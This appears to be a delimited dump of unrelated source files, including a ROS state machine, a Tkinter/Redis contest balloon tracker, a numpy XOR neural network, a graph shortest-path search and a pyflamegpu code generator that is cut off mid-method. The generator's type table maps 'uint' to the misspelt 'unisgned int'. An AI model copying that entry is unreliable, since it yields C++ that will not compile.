    sm = smach.StateMachine(outcomes=['complete_flare', 'aborted'])
    #Disengage, Search, Manuoevre
    with sm:
        smach.StateMachine.add("DISENGAGE", Disengage(flare_task),
                               transitions={'start_complete': "SEARCH",
                                            'complete_outcome': 'complete_flare',
                                            'aborted': 'aborted'})
        smach.StateMachine.add("SEARCH", Search(flare_task),
                               transitions={'search_complete': "MANUOEVRE", 'aborted': 'aborted',
                                            'mission_abort': "DISENGAGE"})
        smach.StateMachine.add("MANUOEVRE", Manuoevre(flare_task),
                               transitions = {'manuoevring': "MANUOEVRE",
                                              'manuoevre_complete': "COMPLETING",
                                              'aborted': 'aborted',
                                              'mission_abort': "DISENGAGE"})
        smach.StateMachine.add("COMPLETING", Completing(flare_task),
                               transitions = {'complete_complete': "DISENGAGE",
                                              'completing': "COMPLETING",
                                              'aborted': 'aborted',
                                              'mission_abort': "DISENGAGE"})
    sis = smach_ros.IntrospectionServer('flare_task', sm, '/SM_ROOT')
    sis.start()
    outcomes = sm.execute()
    #wait for ctrl-c
    rospy.spin()
    sis.stop()
|
# -*- coding: utf-8 -*-
import argparse
import redis
from Tkinter import *
import ttk
import json
import time
import thread
R = None                   # Redis connection, created in __main__
NAME = {}                  # user_id (str) -> display name, loaded from --namefile
PROBLEM_NAME = {}          # problem_id (str) -> balloon label, loaded from --problemfile
CONTEST_ID = None
QUEUE_NAME = None          # live queue "ballon_<contest>" consumed by listen()
BACKUP_QUEUE_NAME = None   # persistent copy "ballon_bak_<contest>" read by get_tree()
# Field names / status values used in the per-(user, problem) Redis hashes.
RUNID_FIELD = "runid"
SUBMIT_TIME_FIELD = "submit_time"
STATUS_FIELD = "status"
STATUS_FINISHED = "finished"
STATUS_WAIT = "wait"
def lower_bound(arr, key):
    """Return the smallest index i with arr[i] >= key, or len(arr) if no
    such element exists. `arr` must be sorted ascending.

    The hand-rolled binary search is replaced by the standard library's
    bisect_left, which has exactly these semantics.
    """
    from bisect import bisect_left  # stdlib equivalent of the original search
    return bisect_left(arr, key)
def get_status_key(user_id, pid):
    """Redis hash key holding delivery state for one (user, problem) pair."""
    key = "status_%d_%d" % (user_id, pid)
    return key
def get_name(user_id):
    """Look up a user's display name; fall back to a generic label when
    the id is not present in the NAME table."""
    key = str(user_id)
    if key in NAME:
        return NAME[key]
    return "user: %s" % key
def get_problem_color(pid):
    """Look up a problem's balloon label; fall back to the raw id string
    when it is not present in the PROBLEM_NAME table."""
    key = str(pid)
    if key in PROBLEM_NAME:
        return PROBLEM_NAME[key]
    return key
class PrinterTkinter:
    """Tk GUI for tracking balloon delivery at a programming contest.

    Reads accepted-solution events ("uid_pid_runid" strings) from a Redis
    backup queue at startup and from the live queue in a background thread,
    keeps per-(user, problem) delivery state in Redis hashes, and shows a
    table of pending/delivered balloons. Pending rows are kept sorted by
    runid; delivered rows go to the end.

    NOTE(review): get_tree() and the tail of listen() are near-identical
    copies — confirm before refactoring, but they should share one helper.
    """
    def __init__(self):
        self.root = Tk()
        self.root.title("气球发放")
        self.runid_to_node = dict()    # runid -> Treeview row id
        self.runid_to_uid = dict()
        self.runid_to_pid = dict()
        self.have_uid_pid = set()      # "uid_pid" pairs already displayed
        self.unfinished_runid = []     # sorted runids still awaiting a balloon
        self.frame_left_top = Frame(width=400, height=200)
        self.frame_right_top = Frame(width=400, height=200)
        self.frame_center = Frame(width=800, height=400)
        self.frame_bottom = Frame(width=800, height=50)
        # Top-left area: delivered/pending counters.
        self.left_top_title = Label(self.frame_left_top, text="发放状态:", font=('Arial', 25))
        self.left_top_title.grid(row=0, column=0, columnspan=2, sticky=NSEW, padx=50, pady=30)
        self.var_finish = StringVar()
        self.var_wait = StringVar()
        self.left_top_frame = Frame(self.frame_left_top)
        self.left_top_frame_left1 = Label(self.frame_left_top, text="已发放", font=('Arial', 20))
        self.left_top_frame_left2 = Label(self.frame_left_top, textvariable=self.var_finish, font=('Arial', 15))
        self.var_finish.set(0)
        self.left_top_frame_right1 = Label(self.frame_left_top, text="未发放", font=('Arial', 20))
        self.left_top_frame_right2 = Label(self.frame_left_top, textvariable=self.var_wait, font=('Arial', 15))
        self.var_wait.set(0)
        self.left_top_frame_left1.grid(row=1, column=0)
        self.left_top_frame_left2.grid(row=1, column=1)
        self.left_top_frame_right1.grid(row=2, column=0)
        self.left_top_frame_right2.grid(row=2, column=1)
        # Top-right area: runid entry + button to toggle a row's status.
        self.var_entry = StringVar()
        self.right_top_title = Label(self.frame_right_top, text="切换状态(输入runid):", font=('Arial', 20))
        self.right_top_entry = Entry(self.frame_right_top, textvariable=self.var_entry)
        # NOTE(review): assigns the `int` type itself, not a value — looks unused.
        self.number = int
        self.right_top_button = Button(self.frame_right_top, text="确定", command=self.button_switch, font=('Arial', 15))
        self.right_top_title.grid(row=0, column=0)
        self.right_top_entry.grid(row=1, column=0)
        self.right_top_button.grid(row=2, column=0, padx=20, pady=20)
        # Center area: the submissions table.
        self.tree = ttk.Treeview(self.frame_center, show="headings", height=18, columns=("a", "b", "c", "d", "e"))
        self.vbar = ttk.Scrollbar(self.frame_center, orient=VERTICAL, command=self.tree.yview)
        # Wire the tree view to its scrollbar.
        self.tree.configure(yscrollcommand=self.vbar.set)
        # Table column headers.
        self.tree.column("a", width=50, anchor="center")
        self.tree.column("b", width=150, anchor="center")
        self.tree.column("c", width=150, anchor="center")
        self.tree.column("d", width=200, anchor="center")
        self.tree.column("e", width=150, anchor="center")
        self.tree.heading("a", text="Runid")
        self.tree.heading("b", text="User")
        self.tree.heading("c", text="Problem")
        self.tree.heading("d", text="Time")
        self.tree.heading("e", text="Status")
        # Populate the table from the Redis backup queue.
        self.get_tree()
        self.tree.grid(row=0, column=0, sticky=NSEW)
        self.vbar.grid(row=0, column=1, sticky=NS)
        # Lay out the four frames.
        self.frame_left_top.grid(row=0, column=0, padx=2, pady=5)
        self.frame_right_top.grid(row=0, column=1, padx=30, pady=30)
        self.frame_center.grid(row=1, column=0, columnspan=2, padx=4, pady=5)
        self.frame_bottom.grid(row=2, column=0, columnspan=2)
        self.frame_left_top.grid_propagate(0)
        self.frame_right_top.grid_propagate(0)
        self.frame_center.grid_propagate(0)
        self.frame_bottom.grid_propagate(0)
        # Background consumer of the live queue; Tk main loop runs below.
        thread.start_new_thread(self.listen, ())
        self.root.mainloop()
    # Initial table fill from the backup queue.
    def get_tree(self):
        """Replay the backup queue, creating Redis state for unseen
        (user, problem) pairs and inserting one table row per pair."""
        bak_list = R.lrange(BACKUP_QUEUE_NAME, 0, -1)
        for bak in bak_list:
            bak = bak.split('_')
            uid = int(bak[0])
            pid = int(bak[1])
            runid = int(bak[2])
            self.runid_to_uid[runid] = uid
            self.runid_to_pid[runid] = pid
            if R.hget(get_status_key(uid, pid), RUNID_FIELD) == None:
                # First time this (user, problem) is seen: create its hash.
                R.hset(get_status_key(uid, pid), RUNID_FIELD, runid)
                status = STATUS_WAIT
                R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
                submit_time = time.ctime()
                R.hset(get_status_key(uid, pid), SUBMIT_TIME_FIELD, submit_time)
                self.have_uid_pid.add("%d_%d" % (uid, pid))
            elif "%d_%d" % (uid, pid) in self.have_uid_pid:
                # Already displayed this pair; skip duplicates.
                continue
            else:
                # Known in Redis but not displayed yet: load stored state.
                status = R.hget(get_status_key(uid, pid), STATUS_FIELD)
                submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
                self.have_uid_pid.add("%d_%d" % (uid, pid))
            if status == STATUS_FINISHED:
                self.var_finish.set(int(self.var_finish.get()) + 1)
                pos = "end"
            else:
                # Pending rows stay sorted by runid.
                self.var_wait.set(int(self.var_wait.get()) + 1)
                pos = lower_bound(self.unfinished_runid, runid)
                self.unfinished_runid.insert(pos, runid)
            node = self.tree.insert("", str(pos), values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
            self.runid_to_node[runid] = node
    def button_switch(self):
        """Toggle the wait/finished status of the runid typed in the entry,
        updating Redis, the counters, and the row's table position."""
        self.number = self.right_top_entry.get()
        runid = int(self.right_top_entry.get())
        if not (runid in self.runid_to_node):
            return
        self.tree.delete(self.runid_to_node[runid])
        uid = self.runid_to_uid[runid]
        pid = self.runid_to_pid[runid]
        status_before = R.hget(get_status_key(uid, pid), STATUS_FIELD)
        submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
        if status_before == STATUS_WAIT:
            status = STATUS_FINISHED
            R.hset(get_status_key(uid, pid), STATUS_FIELD, STATUS_FINISHED)
        else:
            status = STATUS_WAIT
            R.hset(get_status_key(uid, pid), STATUS_FIELD, STATUS_WAIT)
        if status == STATUS_FINISHED:
            # Leaving the pending list; finished rows go to the end.
            pos = lower_bound(self.unfinished_runid, runid)
            self.unfinished_runid.pop(pos)
            pos = "end"
        else:
            # Re-entering the pending list in sorted position.
            pos = lower_bound(self.unfinished_runid, runid)
            self.unfinished_runid.insert(pos, runid)
        node = self.tree.insert("", str(pos), values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
        if status == STATUS_WAIT:
            self.var_wait.set(int(self.var_wait.get()) + 1)
            self.var_finish.set(int(self.var_finish.get()) - 1)
        else:
            self.var_wait.set(int(self.var_wait.get()) - 1)
            self.var_finish.set(int(self.var_finish.get()) + 1)
        R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
        self.runid_to_node[runid] = node
    def listen(self):
        """Background thread: block on the live queue, mirror each event to
        the backup queue, then insert/update rows exactly like get_tree()."""
        while True:
            msg = R.blpop(QUEUE_NAME, 0)[1]
            R.rpush(BACKUP_QUEUE_NAME, msg)
            bak = msg.split('_')
            uid = int(bak[0])
            pid = int(bak[1])
            runid = int(bak[2])
            self.runid_to_uid[runid] = uid
            self.runid_to_pid[runid] = pid
            if R.hget(get_status_key(uid, pid), RUNID_FIELD) == None:
                R.hset(get_status_key(uid, pid), RUNID_FIELD, runid)
                status = STATUS_WAIT
                R.hset(get_status_key(uid, pid), STATUS_FIELD, status)
                submit_time = time.ctime()
                R.hset(get_status_key(uid, pid), SUBMIT_TIME_FIELD, submit_time)
                self.have_uid_pid.add("%d_%d" % (uid, pid))
            elif "%d_%d" % (uid, pid) in self.have_uid_pid:
                continue
            else:
                status = R.hget(get_status_key(uid, pid), STATUS_FIELD)
                submit_time = R.hget(get_status_key(uid, pid), SUBMIT_TIME_FIELD)
                self.have_uid_pid.add("%d_%d" % (uid, pid))
            if status == STATUS_FINISHED:
                self.var_finish.set(int(self.var_finish.get()) + 1)
                pos = "end"
            else:
                self.var_wait.set(int(self.var_wait.get()) + 1)
                pos = lower_bound(self.unfinished_runid, runid)
                self.unfinished_runid.insert(pos, runid)
            node = self.tree.insert("", str(pos),
                                    values=(runid, get_name(uid), get_problem_color(pid), submit_time, status))
            self.runid_to_node[runid] = node
if __name__ == '__main__':
    # CLI entry: connect to Redis, load the user/problem lookup tables,
    # derive the queue names for this contest, and start the GUI (blocks
    # in Tk's main loop).
    parser = argparse.ArgumentParser(prog='NENU-OJ Ballon')
    parser.add_argument('--namefile', dest='namefile', required=True, type=str, help='such as namefile.json')
    parser.add_argument('--problemfile', dest='problemfile', required=True, type=str, help='such as problemfile.json')
    parser.add_argument('--redishost', dest='redishost', required=True, type=str, help='such as 127.0.0.1')
    parser.add_argument('--redisport', dest='redisport', required=True, type=int, help='such as 6379')
    parser.add_argument('--contestid', dest='contestid', required=True, type=int, help='such as 9')
    args = parser.parse_args()
    R = redis.Redis(host=args.redishost, port=args.redisport)
    CONTEST_ID = args.contestid
    with open(args.namefile) as f:
        NAME = json.loads(f.read())
    with open(args.problemfile) as f:
        PROBLEM_NAME = json.loads(f.read())
    QUEUE_NAME = "ballon_%d" % CONTEST_ID
    BACKUP_QUEUE_NAME = "ballon_bak_%d" % CONTEST_ID
    PrinterTkinter()
|
class Queue(object):
    """FIFO queue built from two stacks (amortized O(1) push/pop).

    Bug fixes vs. original:
    - pop() now returns the dequeued element (it was discarded);
    - pop() only drains stack_one when stack_two is empty, so FIFO order
      survives interleaved pushes and pops (the original re-drained every
      time and corrupted the order);
    - push() now accepts falsy values such as 0 and '' (only a bare
      push() / push(None) remains a no-op, as before).
    """

    def __init__(self, val_list=None):
        self.stack_one = []   # incoming pushes
        self.stack_two = []   # pending pops, in reversed order
        if val_list:
            for item in val_list:
                self.stack_one.append(item)

    def push(self, val=None):
        """Enqueue `val`; calling with no value is a no-op."""
        if val is not None:
            self.stack_one.append(val)

    def pop(self):
        """Dequeue and return the oldest element; IndexError when empty."""
        if not self.stack_two:
            while self.stack_one:
                self.stack_two.append(self.stack_one.pop())
        return self.stack_two.pop()
def main():
    """Smoke entry point: construct an empty Queue."""
    queue = Queue()


if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
import sys
import csv
import math
import collections
import argparse
import fileinput
import lp
# NOTE(review): parse_args() is never called, so --help and argument
# validation never run and `inputfile` is unused; fileinput.input() reads
# sys.argv[1:] directly, which happens to give the same file-or-stdin
# behavior — confirm whether the parser should be wired up.
parser = argparse.ArgumentParser(description="Takes an input of *.lp format and sets all radii to the same value")
parser.add_argument("inputfile", help="if specified reads a *.lp formatted file otherwise standard in")
R = 1  # radius assigned to every circle
def main():
    """Parse *.lp rows (comment lines stripped), force every circle's
    radius to R, and print each circle.

    Bug fix: the module is imported as `lp`, but the original called
    `lps.parse_lps(...)`, which raised NameError on every run.
    """
    reader = csv.reader(row for row in fileinput.input() if not row.startswith('#'))
    circles = lp.parse_lps(reader)
    for circle in circles:
        circle.r = R
        print(circle)


if __name__ == "__main__":
    main()
|
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_digits
from sklearn.metrics import confusion_matrix, classification_report
from sklearn.preprocessing import LabelBinarizer
def tanh(x):
    """Hyperbolic tangent activation."""
    result = np.tanh(x)
    return result
def tanh_deriv(x):
    """Derivative of tanh: 1 - tanh(x)^2."""
    t = np.tanh(x)
    return 1.0 - t * t
def logistic(x):
    """Logistic sigmoid activation: 1 / (1 + e^-x)."""
    return 1.0 / (1.0 + np.exp(-x))
def logistic_derivative(x):
    """Derivative of the logistic sigmoid: s(x) * (1 - s(x))."""
    s = logistic(x)
    return s * (1 - s)
class NeuralNetwork:
    """Minimal fully-connected network trained by stochastic backprop.

    Weights include bias units (+1 on every layer but the output), so
    inputs are padded with a trailing 1 before the forward pass.
    """
    def __init__(self, layers, activation='tanh'):
        """
        :param layers: A list containing the number of units in each layer.
        Should be at least two values
        :param activation: The activation function to be used. Can be
        "logistic" or "tanh"
        """
        # NOTE(review): no else-branch — an unknown activation string leaves
        # self.activation unset and fails later with AttributeError; confirm.
        if activation == 'logistic':
            self.activation = logistic
            self.activation_deriv = logistic_derivative
        elif activation == 'tanh':
            self.activation = tanh
            self.activation_deriv = tanh_deriv
        self.weights = []
        # Random init in [-0.25, 0.25); hidden layers carry a bias unit (+1).
        for i in range(1, len(layers) - 1):
            print(i)
            self.weights.append((2 * np.random.random((layers[i - 1] + 1, layers[i] + 1)) - 1) * 0.25)
            self.weights.append((2 * np.random.random((layers[i] + 1, layers[i + 1])) - 1) * 0.25)
        # print(self.weights)
    def fit(self, X, y, learning_rate=0.2, epochs=10000):
        # 1. Append a column of ones to X: the input that the bias weight
        # of each first-layer unit multiplies.
        X = np.atleast_2d(X)
        print(X)
        print(X.shape)
        temp = np.ones([X.shape[0], X.shape[1] + 1])
        # print(temp)
        temp[:, 0:-1] = X # adding the bias unit to the input layer
        X = temp
        print(X)
        y = np.array(y)
        print(y)
        # Run `epochs` stochastic gradient updates.
        for k in range(epochs):
            # Pick one random training row; a[0] is the input-layer activation.
            i = np.random.randint(X.shape[0])
            a = [X[i]]
            # a collects per-layer activations; a[-1] is the network output.
            for l in range(len(self.weights)):
                # Forward pass through layer l.
                a.append(self.activation(np.dot(a[l], self.weights[l])))
            # Compute the error at the output layer
            # print(a)
            error = y[i] - a[-1]
            # For output layer, Err calculation (delta is updated error)
            deltas = [error * self.activation_deriv(a[-1])]
            # Starting backpropagation
            for l in range(len(a) - 2, 0, -1): # we need to begin at the second to last layer
                # Compute the updated error (i,e, deltas) for each node going from top layer to input layer
                deltas.append(deltas[-1].dot(self.weights[l].T) * self.activation_deriv(a[l]))
            deltas.reverse()
            # print(deltas)
            # Gradient step on every weight matrix.
            for i in range(len(self.weights)):
                layer = np.atleast_2d(a[i])
                delta = np.atleast_2d(deltas[i])
                self.weights[i] += learning_rate * layer.T.dot(delta)
    def predict(self, x):
        """Forward-propagate a single sample (bias unit appended) and
        return the output-layer activation."""
        x = np.array(x)
        temp = np.ones(x.shape[0] + 1)
        temp[0:-1] = x
        a = temp
        for l in range(0, len(self.weights)):
            a = self.activation(np.dot(a, self.weights[l]))
        return a
# Demo: train a 2-2-1 network on XOR and print its predictions.
nn = NeuralNetwork([2, 2, 1], 'tanh')
X = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
y = np.array([0, 1, 1, 0])
nn.fit(X, y)
for i in [[0, 0], [0, 1], [1, 0], [1, 1]]:
    print(i, nn.predict(i))
# digits = load_digits()
# X = digits.data
# y = digits.target
# X -= X.min() # normalize the values to bring them into the range 0-1
# X /= X.max()
#
# nn = NeuralNetwork([64, 100, 10], 'logistic')
# X_train, X_test, y_train, y_test = train_test_split(X, y)
# labels_train = LabelBinarizer().fit_transform(y_train)
# labels_test = LabelBinarizer().fit_transform(y_test)
# print("start fitting")
# nn.fit(X_train, labels_train, epochs=3000)
# predictions = []
# for i in range(X_test.shape[0]):
# o = nn.predict(X_test[i])
# predictions.append(np.argmax(o))
# print(confusion_matrix(y_test, predictions))
# print(classification_report(y_test, predictions))
|
#https://www.acmicpc.net/problem/9461
# Bug fix: the original first line began with a stray "g" before the
# comment marker ("g#https..."), which is a SyntaxError.
'''
1. Divide 2 case △ and ▽
d[0] is △ sequence
d[1] is ▽ sequence
2. find a role between d[0] and d[1]
'''
import math
t = int(input())
n = []
for _ in range(t):
    n.append(int(input()))
# Only ceil(max(n)/2) entries of each sequence are ever read.
index = math.ceil(max(n)/2)
d = [[0 for _ in range(52)] for _ in range(2)]
d[0][1],d[0][2],d[1][1],d[1][2] = 1,1,1,2
for i in range(3,index + 1):
    d[0][i] = d[1][i-1] + d[1][i-3]
    d[1][i] = d[0][i] + d[0][i-2]
# Odd positions come from the △ sequence, even ones from the ▽ sequence.
for k in n:
    if k % 2 == 1:
        print(d[0][math.ceil(k/2)])
    else:
        print(d[1][math.ceil(k/2)])
from leapp.models import Model, fields
from leapp.topics import TransactionTopic
class TargetRepositoryBase(Model):
    """Base model for target repositories, identified by their repoid."""
    topic = TransactionTopic
    repoid = fields.String()
class UsedTargetRepository(TargetRepositoryBase):
    """A repository that was actually used (see UsedTargetRepositories)."""
    pass
class RHELTargetRepository(TargetRepositoryBase):
    """A RHEL-provided target repository (repoid only)."""
    pass
class CustomTargetRepository(TargetRepositoryBase):
    """A user-supplied repository; name and baseurl are optional."""
    name = fields.Nullable(fields.String())
    baseurl = fields.Nullable(fields.String())
    enabled = fields.Boolean(default=True)
class TargetRepositories(Model):
    """The full set of repositories to use: RHEL ones plus custom ones."""
    topic = TransactionTopic
    rhel_repos = fields.List(fields.Model(RHELTargetRepository))
    custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[])
class UsedTargetRepositories(Model):
    """List of repositories that were used (see UsedTargetRepository)."""
    topic = TransactionTopic
    repos = fields.List(fields.Model(UsedTargetRepository))
class CustomTargetRepositoryFile(Model):
    """Path to a repo file carrying custom target repository definitions."""
    topic = TransactionTopic
    file = fields.String()
|
2,991 | d18c45c08face08ce8f7dad915f1896c24c95cbf | from django.contrib import admin
from main.models import Assignment, Review, Sample, Question, SampleMultipleFile
# Register your models here.
# Default admin pages for these models.
admin.site.register(Assignment)
admin.site.register(Review)
admin.site.register(Question)


class MultipleFileInline(admin.TabularInline):
    """Inline table so a Sample's attached files are edited on the Sample page."""
    model = SampleMultipleFile


class SampleAdmin(admin.ModelAdmin):
    """Admin page for Sample: inline file attachments, slug auto-filled from heading."""
    inlines = [ MultipleFileInline ]
    prepopulated_fields = {'slug': ('heading',)}


admin.site.register(Sample, SampleAdmin)
2,992 | d3f6fb612e314ee2b86f6218719ecac2cc642c59 | # 홍준이는 요즘 주식에 빠져있다. 그는 미래를 내다보는 눈이 뛰어나, 날 별로 주가를 예상하고 언제나 그게 맞아떨어진다. 매일 그는 아래 세 가지 중 한 행동을 한다.
# 1. 주식 하나를 산다.
# 2. 원하는 만큼 가지고 있는 주식을 판다.
# 3. 아무것도 안한다.
# 홍준이는 미래를 예상하는 뛰어난 안목을 가졌지만, 어떻게 해야 자신이 최대 이익을 얻을 수 있는지 모른다. 따라서 당신에게 날 별로 주식의 가격을 알려주었을 때, 최대 이익이 얼마나 되는지 계산을 해달라고 부탁했다.
# 예를 들어 날 수가 3일이고 날 별로 주가가 10, 7, 6일 때, 주가가 계속 감소하므로 최대 이익은 0이 된다. 그러나 만약 날 별로 주가가 3, 5, 9일 때는 처음 두 날에 주식을 하나씩 사고, 마지막날 다 팔아 버리면 이익이 10이 된다.
# 입력의 첫 줄에는 테스트케이스 수를 나타내는 자연수 T가 주어진다. 각 테스트케이스 별로 첫 줄에는 날의 수를 나타내는 자연수 N(2 ≤ N ≤ 1,000,000)이 주어지고, 둘째 줄에는 날 별 주가를 나타내는 N개의 자연수들이 공백으로 구분되어 순서대로 주어진다. 날 별 주가는 10,000이하다.
# 예제 입력
# 3
# 3
# 10 7 6
# 3
# 3 5 9
# 5
# 1 1 3 1 2
# 예제 출력
# 0
# 10
# 5
|
2,993 | 6a09311b5b3b876fd94ed0a9cce30e070528f22c | #manual forward propagation
# Manual forward propagation walkthrough
# (adapted from DataCamp's 'Deep Learning in Python' course)
# run: python3 ~/Documents/pyfiles/dl/forward.py
import numpy as np

# A tiny network: 2 input features -> 2 hidden nodes -> 1 output node.
# Values flow input layer -> hidden layer -> output layer; every edge
# carries a weight that scales the value travelling along it.

# one observation with two numeric features
input_data = np.array([2, 3])

# weights connecting the inputs to each hidden node, and the hidden
# nodes to the single output node
weights = {'node_0': np.array([1, 1]), 'node_1': np.array([-1, 1]), 'output': np.array([2, -1])}
print(weights)

# each node's value is the weighted sum of its inputs:
# (in1 * w1) + (in2 * w2) -- i.e. a dot product
node_0_val = np.dot(input_data, weights['node_0'])
node_1_val = np.dot(input_data, weights['node_1'])

# gather the hidden layer into one array so the output step looks the same
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)

# the output layer is computed the same way from the hidden values
output_val = np.dot(hidden_layer_vals, weights['output'])
print(output_val)

# For these weights the forward pass yields a hidden layer of [5 1] and an
# output of 9 -- that is the whole of forward propagation.
2,994 | f882589729d74a910d20856d4dc02546fe316e0d | from Graph import create_random_graph
def find_accessible_vertices_backwards(graph, end_vertex):
    """BFS over inbound edges starting from end_vertex.

    Returns a dict mapping each vertex that can reach end_vertex to the next
    vertex on a shortest path towards end_vertex (end_vertex itself is not a
    key). Raises ValueError if end_vertex is not a vertex of the graph.
    """
    from collections import deque

    if end_vertex not in graph.parse_vertices():
        raise ValueError("The end vertex is not in the graph.")
    visited = {end_vertex}        # set: O(1) membership (was an O(n) list scan)
    queue = deque([end_vertex])   # deque: O(1) pops from the front (was list slicing)
    next_vertex = {}
    distance_to_end = {end_vertex: 0}
    while queue:
        current = queue.popleft()
        for edge in graph.parse_inbound_edges(current):
            source = edge.source_id
            if source not in visited:
                visited.add(source)
                queue.append(source)
                distance_to_end[source] = distance_to_end[current] + 1
                next_vertex[source] = current
    return next_vertex
def find_minimum_length_path(graph, start_vertex, end_vertex):
    """Return the vertices of a minimum-length path from start_vertex to
    end_vertex, inclusive at both ends.

    Raises ValueError if end_vertex is not in the graph or no path exists.
    """
    # BFS from the end; also validates end_vertex.
    next_vertex = find_accessible_vertices_backwards(graph, end_vertex)
    # Fixed edge case: a vertex trivially reaches itself with a 0-edge path
    # (previously this raised "There is no path ...").
    if start_vertex == end_vertex:
        return [start_vertex]
    if start_vertex not in next_vertex:
        raise ValueError("There is no path from " + str(start_vertex) + " to " + str(end_vertex))
    path = [start_vertex]
    while path[-1] != end_vertex:
        path.append(next_vertex[path[-1]])
    return path
def main():
    """Build a random graph, print its edges, then demo the BFS helpers."""
    graph = create_random_graph(5, 10)
    print("THE GRAPH:")
    for vertex in graph.parse_vertices():
        for edge in graph.parse_outbound_edges(vertex):
            print(edge)
    print("\n")
    # vertices that can reach vertex 1
    reachable = find_accessible_vertices_backwards(graph, 1)
    print(reachable.keys())
    print("\n")
    # a shortest path from 1 to 4 (may raise ValueError for unlucky graphs)
    print(find_minimum_length_path(graph, 1, 4))


main()
2,995 | 8443d208a6a6bef82240235eeadbf6f8eaf77bcb | from __future__ import print_function, unicode_literals
import sys
import ast
import os
import tokenize
import warnings
from io import StringIO
def interleave(inter, f, seq):
    """Apply f to every item of seq, invoking inter() between consecutive items."""
    iterator = iter(seq)
    try:
        head = next(iterator)
    except StopIteration:
        return
    f(head)
    for item in iterator:
        inter()
        f(item)
class CodeGenException(Exception):
    """Generic exception raised for errors encountered during code generation."""
class CodeGenerator:
"""Methods in this class recursively traverse an AST and
output source code for the abstract syntax; original formatting
is disregarded. """
# represents built in functions
pythonbuiltins = ["abs", "float", "int"]
# basic types
basic_arg_types = ['float', 'int']
# supported math constansts
mathconsts = {"pi": "M_PI",
"e": "M_E",
"inf": "INFINITY",
"nan": "NAN",
}
# support for most numpy types except complex numbers and float>64bit
numpytypes = {"byte": "char",
"ubyte": "unsigned char",
"short": "short",
"ushort": "unsigned short",
"intc": "int",
"uintc": "unsigned int",
"uint": "unisgned int",
"longlong": "long long",
"ulonglong": "unsigned long long",
"half": "half", # cuda supported
"single": "float",
"double": "double",
"longdouble": "long double",
"bool_": "bool",
"bool8": "bool",
# sized aliases
"int_": "long",
"int8": "int8_t",
"int16": "int16_t",
"int32": "int32_t",
"int64": "int64_t",
"intp": "intptr_t",
"uint_": "long",
"uint8": "uint8_t",
"uint16": "uint16_t",
"uint32": "uint32_t",
"uint64": "uint64_t",
"uintp": "uintptr_t",
"float_": "float",
"float16": "half",
"float32": "float",
"float64": "double"
}
# getVariableType and setVariableType functions are added dynamically
fgpu_funcs = [ "getID", "getStepCounter", "getIndex" ]
fgpu_attrs = ["ALIVE", "DEAD"]
fgpu_input_msg_funcs = ["radius", "at"] # functions that can be called on message_in that do NOT return iterators
fgpu_input_msg_iter_funcs = ["wrap", "vn", "vn_wrap"] # functions that can be called on message_in that do return iterators
fgpu_input_msg_iter_var_funcs = ["getIndex", "getVirtualX", "getVirtualY", "getVirtualZ"]
fgpu_output_msg_funcs = ["setLocation", "setKey", "setIndex"]
fgpu_agent_out_msg_funcs = ["getID"]
fgpu_env_funcs = ["containsProperty", "containsMacroProperty"]
fgpu_env_macro_funcs = ["exchange", "CAS", "min", "max"]
fgpu_rand_funcs = []
fgpu_message_types = ["pyflamegpu.MessageNone", "pyflamegpu.MessageBruteForce", "pyflamegpu.MessageBucket", "pyflamegpu.MessageSpatial2D", "pyflamegpu.MessageSpatial3D", "pyflamegpu.MessageArray", "pyflamegpu.MessageArray2D", "pyflamegpu.MessageArray3D"]
_fgpu_types = {"Float": "float",
"Double": "double",
"Int": "int",
"UInt": "unsigned int",
"Int8": "int_8",
"UInt8": "uint_8",
"Char": "char",
"UChar": "unsigned char",
"Int16": "int_16",
"UInt16": "uint_16",
"Int32": "int_32",
"UInt32": "uint_32",
"Int64": "int_64",
"UInt64": "uint_64"
}
    def __init__(self, tree, file = sys.stdout):
        """CodeGenerator(tree, file=sys.stdout) -> None.
        Print the source for tree to file.

        Translation happens eagerly: the constructor dispatches the whole AST,
        writes the generated code to `file`, then flushes it.
        """
        self.f = file
        self.future_imports = []
        # current indentation level (number of indent units for fill())
        self._indent = 0
        # dict of locals used to determine if variable already exists in assignments
        self._locals = ["pyflamegpu"]
        # names of user-defined device functions seen so far (callable later)
        self._device_functions = []
        self._message_iterator_var = None # default
        self._input_message_var = 'message_in' # default
        self._output_message_var = 'message_out' # default
        self.dispatch(tree)
        print("", file=self.f)
        self.f.flush()
def _deviceVariableFunctionName(self, tree, permitted_prefixes, allow_lengths = True):
"""
Gets the device function name by translating a typed Python version to a templated cpp version.
Python functions looks like getVariableFloatArray6 and translate to getVariable<float, 6>
This function will detect and test against a set of known types and also extract the Array length
This function returns None if the string is invalid in format but only throws an error if the format is correct but the type is invalid.
"""
cpp_func_name = ""
py_func = tree.attr
# extract function name start
for prefix in permitted_prefixes:
if py_func.startswith(prefix):
cpp_func_name = prefix
py_func = py_func[len(prefix):]
break # dont allow the else
else:
return None
# check type and lengths
if allow_lengths:
#split to get type and Array Length (This could **potentially** be looked up from the model description but current syntax is consistent with swig bindings)
type_and_length = py_func.split("Array")
if type_and_length[0] not in self._fgpu_types:
self.RaiseError(tree, f"'{type_and_length[0]}' is not a valid FLAME GPU type")
t = self._fgpu_types[type_and_length[0]]
# generate template args
if (len(type_and_length) == 1):
cpp_func_name += f"<{t}>"
elif (len(type_and_length) == 2):
cpp_func_name += f"<{t}, {type_and_length[1]}>"
else:
return None
else:
if py_func not in self._fgpu_types:
self.RaiseError(tree, f"'{py_func}' is not a valid FLAME GPU type")
t = self._fgpu_types[py_func]
cpp_func_name += f"<{t}>"
# return
return cpp_func_name
def fill(self, text = ""):
"Indent a piece of text, according to the current indentation level"
self.f.write("\n"+" "*self._indent + text)
def write(self, text):
"Append a piece of text to the current line."
self.f.write(str(text))
def enter(self):
"Print '{', and increase the indentation."
self.write("{")
self._indent += 1
def leave(self):
"Decrease the indentation level and Print '}'"
self._indent -= 1
self.fill("}")
def dispatch(self, tree):
"Dispatcher function, dispatching tree type T to method _T."
if isinstance(tree, list):
for t in tree:
self.dispatch(t)
return
